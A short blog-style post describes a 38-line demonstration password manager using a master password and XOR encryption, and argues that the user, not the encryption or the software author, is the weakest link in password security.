The Source Code fits in a single page without scrolling! It uses master password, XOR encryption and can even copy to clipboard. It’s initial size is 38 lines.

It isn’t designed for real use (while it works flawlessly), but for a demonstration on what can really be absolutely trusted, and what is trusted because of its convenience. Because let me tell you: keepass beats that little Password Manager out of the water when it comes to convenience.

Either way, your passwords are as unsafe as the weakest link of your chain in which you use them. From mind, to keyboard, to OS, to application, to network, to the other side.

And the weakest link is not the encryption, nor the possibility of an exfiltration that would cost a Password Manager Author his reputation (once discovered), and probably his career and life.

The weakest link is you!

 

security
Source